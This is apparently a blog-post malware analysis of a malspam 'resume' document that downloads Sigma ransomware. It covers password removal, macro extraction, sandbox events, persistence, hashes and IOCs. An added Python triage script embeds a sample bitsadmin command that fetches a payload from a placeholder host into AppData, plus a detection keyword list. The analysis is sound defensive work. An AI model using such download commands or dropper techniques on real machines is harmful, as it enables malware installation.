I received some malspam on 03/13/18 entitled “About a internship.” The email came with an attachment called “Janeen Resume.doc”:
The email pretends to come from somebody interested in a job opening who has attached their “résumé.” In reality, the document is a downloader for Sigma ransomware.
Opening the document confirms that it is password protected:
Inputting the password presents the victim with some instructions:
I typically scan files for their file type and, in the case of Office documents, embedded macros. The password protected document came back as a “Composite Document File V2 Document” (OLE2 file) and both olevba.py and oledump.py showed no detections for macros:
To get around this, I simply removed the password and saved the document.
Here you can see that the document is password protected, as well as various document properties such as when it was created and last modified and the author(s). To remove the password, click on “Protect Document”, remove the password, click “OK”, and then save the document:
Scanning the document again now shows it as a “Microsoft Word 2007+” document, i.e. the Office Open XML (OOXML) file format. Because an OOXML file is a ZIP container holding XML parts, we can unzip it and look at the contents:
Unzipping the file reveals its contents, including the images (image1.png and image2.png) used within the document. Embedded macros in XML-based Office documents are typically stored in a binary file named vbaProject.bin, which we can see in the “word” directory.
Using strings we can quickly examine vbaProject.bin for any interesting ASCII strings:
As you can see from the image above, strings found the command and URL used to download the malware payload.
An even better option for this scenario would be to use olevba.py:
olevba.py is a handy tool because it gives analysts a table summarizing the risky keywords found within the file. Another good option is oledump.py.
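The triage steps above (check the container type, unzip the OOXML, locate vbaProject.bin, run strings, review risky keywords) can be scripted. The following is an added example, not code from the original post or from the oletools project; it builds a constructed .docx-style ZIP in memory with a fake vbaProject.bin, and the hostname and file names in it are placeholders rather than the post's IOCs.

```python
"""Triage an OOXML document for an embedded VBA project (constructed example,
not from the original post): build a small .docx-style ZIP in memory with a
fake word/vbaProject.bin, then scan it as the post does by hand."""
import io
import re
import zipfile

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # "Composite Document File V2" header
# Risky keywords of the kind olevba flags, plus the download tool seen in this campaign.
SUSPICIOUS = ("bitsadmin", "http", "AppData", ".exe", "Shell", "AutoOpen", "Document_Open")

def ascii_strings(data: bytes, min_len: int = 6) -> list:
    """Return printable ASCII runs of at least min_len bytes, like `strings -n`."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]

def triage_ooxml(blob: bytes) -> dict:
    """Report container type, any VBA project parts, and risky strings found in them."""
    result = {"is_ole2": blob.startswith(OLE2_MAGIC), "is_zip": False,
              "vba_parts": [], "hits": []}
    if not zipfile.is_zipfile(io.BytesIO(blob)):
        return result  # still OLE2 (e.g. password protected): nothing to unzip
    result["is_zip"] = True
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if name.lower().endswith("vbaproject.bin"):
                result["vba_parts"].append(name)
                for s in ascii_strings(zf.read(name)):
                    if any(k.lower() in s.lower() for k in SUSPICIOUS):
                        result["hits"].append(s)
    return result

def build_sample() -> bytes:
    """Constructed input: minimal OOXML zip whose fake vbaProject.bin holds a placeholder command."""
    # Hostname and file names are placeholders, not the IOCs from the post.
    fake_vba = (b"\x00\x01garbage\x00"
                b"cmd /c bitsadmin /transfer x http://example.invalid/payload.bin "
                b"%AppData%\\payload.exe\x00\x00")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/media/image1.png", b"\x89PNG fake")
        zf.writestr("word/vbaProject.bin", fake_vba)
    return buf.getvalue()

if __name__ == "__main__":
    print(triage_ooxml(build_sample()))
```

Run against a real sample, a password-protected document comes back as OLE2 with nothing to unzip, which is the same dead end the post hit before removing the password.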
Now, getting back to examining the file from the perspective of the victim: after entering the password and clicking “Enable Content”, the victim’s host makes a HEAD request, followed by a GET request, for the malware payload:
You can see that the User-Agent is “Microsoft BITS/7.8”, confirming that the bitsadmin tool was used to download the file. The malware payload is downloaded from the remote server and saved to %AppData% as “taskwgr.exe”.
Payload in %AppData%:
Process tree during the infection:
Some key events from my sandbox (not a comprehensive list of events):
- cmd.exe (PID: 4832) creates process conhost.exe (PID: 2420)
- cmd.exe (PID: 4832) creates process bitsadmin.exe (PID: 3432)
- svchost.exe (PID: 888) renames file C:\Users\\AppData\Roaming\BIT1F3F.tmp to C:\Users\\AppData\Roaming\taskwgr.exe
- bitsadmin.exe (PID: 3432) kills its own process
- cmd.exe (PID: 4832) creates process taskwgr.exe (PID: 4600)
- taskwgr.exe (PID: 4600) creates child process taskwgr.exe (PID: 5656)
- cmd.exe (PID: 4832) kills its own process
- taskwgr.exe (PID: 5656) creates file C:\Users\\AppData\Roaming\Microsoft\[GUID]\taskwgr.exe
- taskwgr.exe (PID: 5656) sets autostart registry key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\chrome
- taskwgr.exe (PID: 5656) creates file C:\Users\\AppData\Roaming\Microsoft\[GUID]\System.zip
A copy of the malware in %AppData%\Microsoft\[GUID]\:
Persistence mechanism:
The sample never encrypted files in my virtual lab, whereas it successfully encrypted files in a physical lab (not mine). However, I didn’t have time for further analysis, so I can’t confirm how, or whether, it detects my virtualized sandbox.
When the process is complete, the desktop background is changed to a green text message on a black background (the images below were borrowed from the Internet):
While encrypting the system, Sigma ransomware creates ransom notes named ReadMe.txt in each folder in which a file was encrypted.
Below is an image of ReadMe.html:
Sigma ransomware page:
Hashes
SHA256: 55f497f3728c57d284bd710bb517d6d2c56f0a6cc2248cfaf649294655abc1bc
File name: Resume.doc
Hybrid-Analysis Report
SHA256: cbbb8b1b14b3df9d331ece7167ca9ab2b7da61839742a107142016d8d9c6f8e8
File name: taskwgr.exe
Hybrid-Analysis Report
Network-Based IOCs
- 36.110.114.130 – onlinedocuments.ir – HEAD and GET – /email.bin
- 66.212.29.250 – ip-api.com – GET /json – NON MALICIOUS
- yowl2ugopitfzzwb.onion
Samples
The password is “infected”
Article Link: https://malwarebreakdown.com/2018/03/14/malspam-contains-password-protected-document-that-downloads-sigma-ransomware/